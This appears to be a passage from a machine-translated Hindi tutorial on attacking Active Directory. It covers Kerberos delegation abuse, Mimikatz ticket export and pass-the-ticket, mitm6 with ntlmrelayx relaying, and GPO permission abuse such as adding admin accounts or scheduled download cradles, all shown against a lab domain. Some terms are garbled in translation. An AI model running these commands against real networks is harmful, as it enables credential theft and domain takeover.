рдПрдХ рдорд╢реАрди рд╕реЗ рд╢реБрд░реВ рдХрд░рдирд╛ рдЬреЛ рдПрдХ рдбреЛрдореЗрди рдореЗрдВ рдирд╣реАрдВ рд╣реИ

 /Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'domain\user' -Domain 'fqdn_of_target_domain' -Password 'Pass' 

  • aclpwn.py рдПрдХ рд╕рдорд╛рди рдЙрдкрдХрд░рдг рд╣реИ рдЬрд┐рд╕реЗ рдкрд╛рдпрдерди рдореЗрдВ рд▓рд┐рдЦрд╛ рдЧрдпрд╛ рд╣реИ

рдХрд░реНрдмрд░реЛрд╕ рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓


рдкреНрд░рд╛рдзрд┐рдХрд░рдг рдХрд╛ рдХрд░реНрдмреЗрд░реЛрд╕ рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдЖрдкрдХреЛ рдХрд┐рд╕реА рдЕрдиреНрдп рд╕рд░реНрд╡рд░ рдкрд░ рд╣реЛрд╕реНрдЯ рдХрд┐рдП рдЧрдП рд╕рдВрд╕рд╛рдзрдиреЛрдВ рддрдХ рдкрд╣реБрдВрдЪрдиреЗ рдХреЗ рд▓рд┐рдП рдЕрдВрддрд┐рдо-рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХрд╛ рдкреБрди: рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред

рдХрд░реНрдмрд░реЛрд╕ рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рддреАрди рдкреНрд░рдХрд╛рд░ рдХрд╛ рд╣реЛ рд╕рдХрддрд╛ рд╣реИ:

  1. рдЕрд╕реАрдорд┐рдд (рдЕрд╕рдВрд╡реИрдзрд╛рдирд┐рдХ рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓)ред Windows Server 2003 рд╕реЗ рдкрд╣рд▓реЗ рдПрдХрдорд╛рддреНрд░ рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рд╡рд┐рдХрд▓реНрдк
  2. рд╡рд┐рдВрдбреЛрдЬ рд╕рд░реНрд╡рд░ 2003 рдХреЗ рдмрд╛рдж рд╕реЗ рд╡рд┐рд╡рд╢ рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓
  3. рд╕рдВрд╕рд╛рдзрди-рдЖрдзрд╛рд░рд┐рдд рд╡рд┐рд╡рд╢ рдкреНрд░рддрд┐рдирд┐рдзрд┐ рд╡рд┐рдВрдбреЛрдЬ рд╕рд░реНрд╡рд░ 2012 рдореЗрдВ рдкреЗрд╢ рдХрд┐рдпрд╛ рдЧрдпрд╛

рдЕрд╕реАрдорд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓


рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рд╕реНрдиреИрдк-рдЗрди рдореЗрдВ, рдЕрд╕реАрдорд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐ рд╕реБрд╡рд┐рдзрд╛ рд╕рдХреНрд╖рдо рд╣реИ рдЬреЛ рдирд┐рдореНрдирд╛рдиреБрд╕рд╛рд░ рд╣реИ:



рд╕реНрдкрд╖реНрдЯрддрд╛ рдХреЗ рд▓рд┐рдП, рд╡рд┐рдЪрд╛рд░ рдХрд░реЗрдВ рдХрд┐ рдЖрд░реЗрдЦ рдкрд░ рдЕрд╕реАрдорд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдХреИрд╕реЗ рд╣реЛрддрд╛ рд╣реИред



  1. рдпреВрдЬрд░ рдХрд╛ рдкрд╛рд╕рд╡рд░реНрдб ntlm рд╣реИрд╢ рдореЗрдВ рдмрджрд▓ рдЬрд╛рддрд╛ рд╣реИред рдЯрд╛рдЗрдорд╕реНрдЯреИрдореНрдк рдХреЛ рдЗрд╕ рд╣реИрд╢ рдХреЗ рд╕рд╛рде рдПрдиреНрдХреНрд░рд┐рдкреНрдЯ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ рдФрд░ рдЯреАрдЬреАрдЯреА рдЯрд┐рдХрдЯ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдХреЛ рднреЗрдЬрд╛ рдЧрдпрд╛ рд╣реИред
  2. рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдирдХрд╛рд░реА рдХреА рдЬрд╛рдБрдЪ рдХрд░рддрд╛ рд╣реИ (рд▓реЙрдЧрдСрди рдкрд░ рдкреНрд░рддрд┐рдмрдВрдз, рд╕рдореВрд╣реЛрдВ рдореЗрдВ рд╕рджрд╕реНрдпрддрд╛ рдЖрджрд┐), рдПрдХ рдЯреАрдЬреАрдЯреА рдЯрд┐рдХрдЯ рдмрдирд╛рддрд╛ рд╣реИ рдФрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рднреЗрдЬрддрд╛ рд╣реИред TGT рдЯрд┐рдХрдЯ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рд╣реИ, рд╣рд╕реНрддрд╛рдХреНрд╖рд░рд┐рдд рд╣реИ, рдФрд░ рдХреЗрд╡рд▓ krbtgt рдЗрд╕рдХрд╛ рдбреЗрдЯрд╛ рдкрдврд╝ рд╕рдХрддрд╛ рд╣реИред
  3. рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╡реЗрдм рд╕рд░реНрд╡рд░ рдкрд░ рд╡реЗрдм рд╕реЗрд╡рд╛ рддрдХ рдкрд╣реБрдВрдЪрдиреЗ рдХреЗ рд▓рд┐рдП рдЯреАрдЬреАрдПрд╕ рдЯрд┐рдХрдЯ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░рддрд╛ рд╣реИред
  4. рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдПрдХ TGS рдЯрд┐рдХрдЯ рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИред
  5. рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╡реЗрдм рд╕рд░реНрд╡рд░ рдкрд░ TGT рдФрд░ TGS рдЯрд┐рдХрдЯ рднреЗрдЬрддрд╛ рд╣реИред
  6. рд╡реЗрдм рд╕рд░реНрд╡рд░ рд╕реЗрд╡рд╛ рдЦрд╛рддрд╛ рдбреЗрдЯрд╛рдмреЗрд╕ рд╕рд░реНрд╡рд░ рддрдХ рдкрд╣реБрдБрдЪрдиреЗ рдХреЗ рд▓рд┐рдП TGS рдЯрд┐рдХрдЯ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ TGT рдЯрд┐рдХрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИред
  7. рд╕реЗрд╡рд╛ рдЦрд╛рддрд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд░реВрдк рдореЗрдВ рдбреЗрдЯрд╛рдмреЗрд╕ рд╕рд░реНрд╡рд░ рд╕реЗ рдЬреБрдбрд╝рддрд╛ рд╣реИред

рдЕрд╕реАрдорд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдХрд╛ рдореБрдЦреНрдп рдЦрддрд░рд╛ рдпрд╣ рд╣реИ рдХрд┐ рдЬрдм рдЕрд╕реАрдорд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдХреЗ рд╕рд╛рде рдПрдХ рдорд╢реАрди рд╕рдордЭреМрддрд╛ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рддреЛ рдПрдХ рд╣рдорд▓рд╛рд╡рд░ рдЗрд╕ рдорд╢реАрди рд╕реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЗ рдЯреАрдЬреАрдЯреА рдЯрд┐рдХрдЯ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХреЗрдЧрд╛ рдФрд░ рдЗрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреА рдУрд░ рд╕реЗ рдбреЛрдореЗрди рдореЗрдВ рдХрд┐рд╕реА рднреА рд╕рд┐рд╕реНрдЯрдо рддрдХ рдкрд╣реБрдВрдЪ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХреЗрдЧрд╛ред

рдЕрд╕реАрдорд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рд╡рд╛рд▓реЗ рдбреЛрдореЗрди рдореЗрдВ рдорд╢реАрдиреЛрдВ рдХреА рдЦреЛрдЬ рдХрд░реЗрдВ:

  • PowerView

     Get-NetComputer -unconstrained 
  • рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЙрдбреНрдпреВрд▓

     Get-Adcomputer -Filter {TrustedForDelegation -eq $True} 
    ред

рдЯрд┐рдХрдЯ рдирд┐рд░реНрдпрд╛рдд:

  • Mimikatz рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ред sekurlsa :: рдЯрд┐рдХрдЯ / рдирд┐рд░реНрдпрд╛рдд
  • рдЖрдк рдкрд╛рд╕-рдж-рдЯрд┐рдХрдЯ рд╣рдорд▓реЗ рднреА рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

      kerberos::ptt C:\tickets\. 



рд╕реАрдорд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓


рд╕реАрдорд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдХреА рд╡рд┐рдзрд┐ рдЖрдкрдХреЛ рдХреЗрд╡рд▓ рдЕрдиреБрдордд рд╕реЗрд╡рд╛рдУрдВ рдФрд░ рдПрдХ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдорд╢реАрди рддрдХ рдкрд╣реБрдВрдЪрдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИред рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рд╕реНрдиреИрдк-рдЗрди рдореЗрдВ, рдпрд╣ рдЗрд╕ рддрд░рд╣ рджрд┐рдЦрддрд╛ рд╣реИ:



рд╕реАрдорд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдХреЗ рд╕рд╛рде, 2 рдХреЗрд░реНрдмрд░реЛрд╕ рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдПрдХреНрд╕рдЯреЗрдВрд╢рди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ:

  • S4USelf
  • S4UProxy

S4U2Self рдХрд╛ рдЙрдкрдпреЛрдЧ рддрдм рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рдЬрдм рдЧреНрд░рд╛рд╣рдХ рдХреЗрд░реНрдмрд░реЛрд╕ рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдкреНрд░рдорд╛рдгрд┐рдд рдирд╣реАрдВ рдХрд░рддрд╛ рд╣реИред

рдЕрд╕реАрдорд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдХреЗ рд▓рд┐рдП, TGT рдХрд╛ рдЙрдкрдпреЛрдЧ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреА рдкрд╣рдЪрд╛рди рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдЬрд┐рд╕ рд╕реНрдерд┐рддрд┐ рдореЗрдВ S4U рдПрдХреНрд╕рдЯреЗрдВрд╢рди PAata -FOR-USER рд╕рдВрд░рдЪрдирд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИ рдХреНрдпреЛрдВрдХрд┐ рдирдП рдкреНрд░рдХрд╛рд░ рдХреЗ рдкреИрдбреЗрдЯрд╛ / рдкреВрд░реНрд╡-рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдбреЗрдЯрд╛ рдХреНрд╖реЗрддреНрд░ рдореЗрдВред S4U2self рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЛ рдХреЗрд╡рд▓ рддрднреА рдЕрдиреБрдорддрд┐ рджреА рдЬрд╛рддреА рд╣реИ рдЬрдм рдЕрдиреБрд░реЛрдз рдХрд░рдиреЗ рд╡рд╛рд▓реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рдкрд╛рд╕ рдЕрдкрдиреЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдЕрдХрд╛рдЙрдВрдЯрдХрдВрдЯреНрд░реЛрд▓ рдореЗрдВ TRUSTED_TO_AUTH_FOR_DELEGATION рдлрд╝реАрд▓реНрдб рд╕реЗрдЯ рд╣реЛред



S4U2Proxy рд╕реЗрд╡рд╛ рдЦрд╛рддреЗ рдХреЛ рдЕрдиреБрдорддрд┐ рджреА рдЧрдИ рд╕реЗрд╡рд╛рдУрдВ (msds-allowtodelegateto) рддрдХ рдкрд╣реБрдВрдЪ рдХреЗ рд▓рд┐рдП TGS рдЯрд┐рдХрдЯ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП S4U2proxy рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдореЗрдВ рдкреНрд░рд╛рдкреНрдд рдкреБрдирд░реНрдирд┐рд░реНрджреЗрд╢рд┐рдд рдЯрд┐рдХрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред KDC рдпрд╣ рдЬрд╛рдБрдЪ рдХрд░рддрд╛ рд╣реИ рдХрд┐ рдХреНрдпрд╛ рдЕрдиреБрд░реЛрдзрд┐рдд рд╕реЗрд╡рд╛ рдЕрдиреБрд░реЛрдз рдХрд░рдиреЗ рд╡рд╛рд▓реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ msds-allowtodelegateto рдлрд╝реАрд▓реНрдб рдореЗрдВ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рд╣реИ, рдФрд░ рдЪреЗрдХ рд╕рдлрд▓ рд╣реЛрдиреЗ рдкрд░ рдЯрд┐рдХрдЯ рдЬрд╛рд░реА рдХрд░рддрд╛ рд╣реИред рдЗрд╕ рдкреНрд░рдХрд╛рд░, рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рд╡рд┐рд╢рд┐рд╖реНрдЯ рд▓рдХреНрд╖реНрдп рд╕реЗрд╡рд╛рдУрдВ рдХреЗ рд▓рд┐рдП "рд╕реАрдорд┐рдд" рд╣реИред



рдЖрдк PowerView рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╕реАрдорд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐ рдбреЛрдореЗрди рдореЗрдВ рдХрдВрдкреНрдпреВрдЯрд░ рдФрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЗ рд▓рд┐рдП рдЦреЛрдЬ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ ред

рдЕрд╕реАрдорд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдХреЗ рд╕рд╛рде рдХрдВрдкреНрдпреВрдЯрд░ рдХреА рдЦреЛрдЬ рдХрд░реЗрдВ

 Get-DomainComputer -TrustedtoAuth 

рд╕реАрдорд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЗ рд▓рд┐рдП рдЦреЛрдЬреЗрдВ

 Get-DomainUser -TrustedtoAuth 

рдПрдХ рд╣рдорд▓реЗ рдХрд╛ рд╕рдВрдЪрд╛рд▓рди рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╣рдореЗрдВ рдПрдХ рд╕реНрдкрд╖реНрдЯ рдкрд╛рд╕рд╡рд░реНрдб, рдПрдХ NTLM рдкрд╛рд╕рд╡рд░реНрдб рд╣реИрд╢, рдпрд╛ рдПрдХ TGT рдЯрд┐рдХрдЯ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИред



рд╕рдВрд╕рд╛рдзрди рдЖрдзрд╛рд░рд┐рдд рд╕реАрдорд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓


рдирд┐рдпрдорд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдХреЗ рд╕рд╛рде, S4U рдПрдХреНрд╕рдЯреЗрдВрд╢рди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдЪреВрдВрдХрд┐ рд╕рдВрд╕рд╛рдзрди-рдЖрдзрд╛рд░рд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдореБрдЦреНрдп рд░реВрдк рд╕реЗ рд╕реАрдорд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рд╣реИ, рдРрд╕реЗ рд╣рдорд▓реЗ рдЬреЛ рдирд┐рдпрдорд┐рдд рд╕реАрдорд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдХреЗ рд▓рд┐рдП рдкреНрд░рд╛рд╕рдВрдЧрд┐рдХ рд╣реИрдВ, рд╡реЗ рднреА рдпрд╣рд╛рдВ рдЙрдкрд▓рдмреНрдз рд╣реИрдВред рдЕрдВрддрд░ рдХреЗрд╡рд▓ рдЗрддрдирд╛ рд╣реИ рдХрд┐ рдПрдХ рд╕рд╛рдзрд╛рд░рдг рд╕реАрдорд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдореЗрдВ, рд╕реЗрд╡рд╛ A рдХреЗ рдкрд╛рд╕ msDS-AllowedToDelegateTo = ServiceB рд╡рд┐рд╢реЗрд╖рддрд╛ рд╣реЛрдиреА рдЪрд╛рд╣рд┐рдП, рдФрд░ рдпрд╣рд╛рдБ рд╕реЗрд╡рд╛ B рдореЗрдВ msDS-AllowedToActOnBehalfOfhtherOdentity = рд╕реЗрд╡рд╛ A рд╡рд┐рд╢реЗрд╖рддрд╛ рд╣реЛрдиреА рдЪрд╛рд╣рд┐рдП ред



рдпрд╣ рдЧреБрдг harmj0yy рджреНрд╡рд╛рд░рд╛ рдкреНрд░рдХрд╛рд╢рд┐рдд рдПрдХ рдФрд░ рд╣рдорд▓реЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ редред рдПрдХ рд╣рдорд▓реЗ рдХреЗ рд▓рд┐рдП рдкреНрд░рд┐рдВрд╕рд┐рдкрд▓реЛрдВ рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИрдЕрдиреБрдкреНрд░рд╛рдкреНрддрдСрдЯреЛрдбреЗрд▓рдЧреЗрдЯрдЧреЗрдЯрдСрдХрд╛рдЙрдВрдЯ рдкреИрд░рд╛рдореАрдЯрд░, рдЬреЛ рдПрдордПрд╕рдбреАрдПрд╕-рдСрд▓реНрдЯреЗрдбрдЯреЙрдПрдХреНрдЯрдСрдирдмреЗрдлреЙрд▓рдСрдлрдСрдерд░рд┐рдЯреА рд╡рд┐рд╢реЗрд╖рддрд╛ рдХреЛ рд╕реЗрдЯ рдХрд░рддрд╛ рд╣реИ, рдЬрд┐рд╕рдореЗрдВ рдПрдХреНрд╕реЗрд╕ рдХрдВрдЯреНрд░реЛрд▓ рд▓рд┐рд╕реНрдЯ (рдПрд╕реАрдПрд▓) рд╣реЛрддрд╛ рд╣реИред рдХреЗрд╡рд▓ рд╕реАрдорд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдХреЗ рд╡рд┐рдкрд░реАрдд, рд╣рдореЗрдВ msds-AllowedToActOnBehalfOfOtherIdentity рд╡рд┐рд╢реЗрд╖рддрд╛ рдХреЛ рдмрджрд▓рдиреЗ рдХреЗ рд▓рд┐рдП рдбреЛрдореЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЕрдзрд┐рдХрд╛рд░реЛрдВ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИред рдЖрдк рдпрд╣ рдЬрд╛рди рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рд╡рд┐рд╢реЗрд╖рддрд╛ рдХреЛ рд╕рдВрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рдХрд┐рд╕рдХреЗ рдкрд╛рд╕ рд╣реИ:

 (Get-acl "AD:$((get-adcomputer Windows7).distinguishedname)").access | Where-Object -Property ActiveDirectoryRights -Match WriteProperty |out-gridview 



рдЗрд╕рд▓рд┐рдП, рд╣рдорд▓реЗ рдХреЛ рдЕрдВрдЬрд╛рдо рджреЗрдиреЗ рдХреЗ рд▓рд┐рдП, mitm6 рдкрд░ рдЕрдорд▓ рдХрд░реЗрдВ

 mitm6 -I vmnet0 

рд╣рдо ntlmrelayx рдХреЛ рд╡рд┐рдХрд▓реНрдк рдХреЗ рд╕рд╛рде рд╢реБрд░реВ рдХрд░рддреЗ рд╣реИрдВ - рдбреЗрд▓реАрдЧреЗрдЯ-рдРрдХреНрд╕реЗрд╕

 ntlmrelayx -t ldaps://dc1.jet.lab --delegate-access 

рд╣рдорд▓реЗ рдХреЗ рдкрд░рд┐рдгрд╛рдорд╕реНрд╡рд░реВрдк, ZGXTPVYX $ рдХрдВрдкреНрдпреВрдЯрд░ рдХреЛ рд╡рд┐рдВрдбреЛрдЬ 7 рдХрдВрдкреНрдпреВрдЯрд░ рдХреЗ рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдЕрдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдмрдирд╛рдпрд╛ рдЧрдпрд╛ рд╣реИред

 $x = Get-ADComputer Windows7 -Properties msDS-AllowedToActOnBehalfOfOtherIdentity $x.'msDS-AllowedToActOnBehalfOfOtherIdentity'.Access 



Yegor Podmokov рджреНрд╡рд╛рд░рд╛ PHDays рдореЗрдВ рдПрдХ рдЕрдЪреНрдЫрд╛ рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рд░рд┐рдкреЛрд░реНрдЯ рдкреНрд░рд╕реНрддреБрдд рдХрд┐рдпрд╛ рдЧрдпрд╛ ред



рдЬреАрдкреАрдУ рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ


рд╕рдореВрд╣ рдиреАрддрд┐ рдСрдмреНрдЬреЗрдХреНрдЯ рдПрдХ рдЙрдкрдХрд░рдг рд╣реИ рдЬреЛ рдкреНрд░рд╢рд╛рд╕рдХреЛрдВ рдХреЛ рдХреБрд╢рд▓рддрд╛рдкреВрд░реНрд╡рдХ рдПрдХ рдбреЛрдореЗрди рдХрд╛ рдкреНрд░рдмрдВрдзрди рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред рд▓реЗрдХрд┐рди рдРрд╕рд╛ рд╣реЛрддрд╛ рд╣реИ рдХрд┐ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЛ рдЕрдирд╛рд╡рд╢реНрдпрдХ рдЕрдзрд┐рдХрд╛рд░ рджрд┐рдП рдЬрд╛рддреЗ рд╣реИрдВ, рдЬрд┐рд╕рдореЗрдВ GPO рдиреАрддрд┐рдпреЛрдВ рдХреЛ рдмрджрд▓рдирд╛ рд╢рд╛рдорд┐рд▓ рд╣реИред

рдЙрджрд╛рд╣рд░рдг рдХреЛ рдкреНрд░рджрд░реНрд╢рд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╣рдо Ragnar рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рдбрд┐рдлрд╝реЙрд▓реНрдЯ рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдиреАрддрд┐ (рд╡рд╛рд╕реНрддрд╡рд┐рдХ рдЬреАрд╡рди рдореЗрдВ, рдЗрд╕ рдиреАрддрд┐ рдХреЗ рдЕрдзрд┐рдХрд╛рд░ рдХреЗрд╡рд▓ рдбреЛрдореЗрди рдкреНрд░рд╢рд╛рд╕рдХ рдХреЛ рджрд┐рдП рдЧрдП рд╣реИрдВ, рд╕рдВрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЕрдзрд┐рдХрд╛рд░ рдЬреЛрдбрд╝ рджреЗрдВрдЧреЗ, рд▓реЗрдХрд┐рди рд╣рдорд▓реЗ рдХрд╛ рд╕рд╛рд░ рдирд╣реАрдВ рдмрджрд▓рддрд╛ рд╣реИ; рджреВрд╕рд░реА рдиреАрддрд┐ рдХреЗ рдорд╛рдорд▓реЗ рдореЗрдВ, рдХреЗрд╡рд▓ рдирд┐рдпрдВрддреНрд░рд┐рдд рдореЗрдЬрдмрд╛рди рдкрд░рд┐рд╡рд░реНрддрди рд╣реЛрддрд╛ рд╣реИ)ред PowerView



рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдбреЛрдореЗрди рдХреЗ рд╕рднреА GPO рдХреЗ рдЕрдзрд┐рдХрд╛рд░реЛрдВ рдХреА рдЧрдгрдирд╛ рдХрд░реЗрдВ ред

 Get-NetGPO | % {Get-ObjectAcl -ResolveGUIDs -Name $_.Name} 



рдПрдХ Ragnar рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рдПрдХ GPO рдмрджрд▓рдиреЗ рдХрд╛ рдЕрдзрд┐рдХрд╛рд░ рд╣реИ рдЬрд┐рд╕рдореЗрдВ 6AC1786C-016F-11D2-945F-00C04FB984F9 рдХрд╛ GUID рд╣реИред рдпрд╣ рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐ рдбреЛрдореЗрди рдореЗрдВ рдХреМрди рд╕реЗ рд╣реЛрд╕реНрдЯ рдЗрд╕ рдиреАрддрд┐ рдХреЛ рд▓рд╛рдЧреВ рдХрд░рддреЗ рд╣реИрдВ, рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдХрдорд╛рдВрдб рдЪрд▓рд╛рдПрдБ

 Get-NetOU -GUID "6AC1786C-016F-11D2-945F-00C04FB984F9" | % {Get-NetComputer -AdSpath $_} 



рдореЗрдЬрдмрд╛рди dc1.jet.lab рдорд┐рд▓рд╛ред

рд░рдЧрдирд╛рд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЬрд┐рд╕ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдиреАрддрд┐ рдХреЛ рд╕рдВрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдФрд░ рдЬрд┐рд╕ рдкрд░ рдпрд╣ рдиреАрддрд┐ рд▓рд╛рдЧреВ рд╣реЛрддреА рд╣реИ, рдЙрд╕реЗ рдЬрд╛рдирдиреЗ рдХреЗ рдмрд╛рдж, рд╣рдо dc1.jet.lab рд╣реЛрд╕реНрдЯ рдкрд░ рд╡рд┐рднрд┐рдиреНрди рдХрд╛рд░реНрдп рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

рдиреАрдЪреЗ GPO рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╡рд┐рдХрд▓реНрдк рджрд┐рдП рдЧрдП рд╣реИрдВ
рдХрдВрдкреНрдпреВрдЯрд░ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди \ рдкреНрд░рд╛рдердорд┐рдХрддрд╛рдПрдБ / рдирд┐рдпрдВрддреНрд░рдг рдХрдХреНрд╖ рд╕реЗрдЯрд┐рдВрдЧреНрд╕ \ рдлрд╝реЛрд▓реНрдбрд░ рд╡рд┐рдХрд▓реНрдкCreate/alter file type associations, register DDE actions with those associations
Computer Configuration\Preferences\Control Panel Settings\Local Users and GroupsAdd new local admin account
Computer Configuration\Preferences\Control Panel Settings\Scheduled TasksDeploy a new evil scheduled task (ie: PowerShell download cradle)
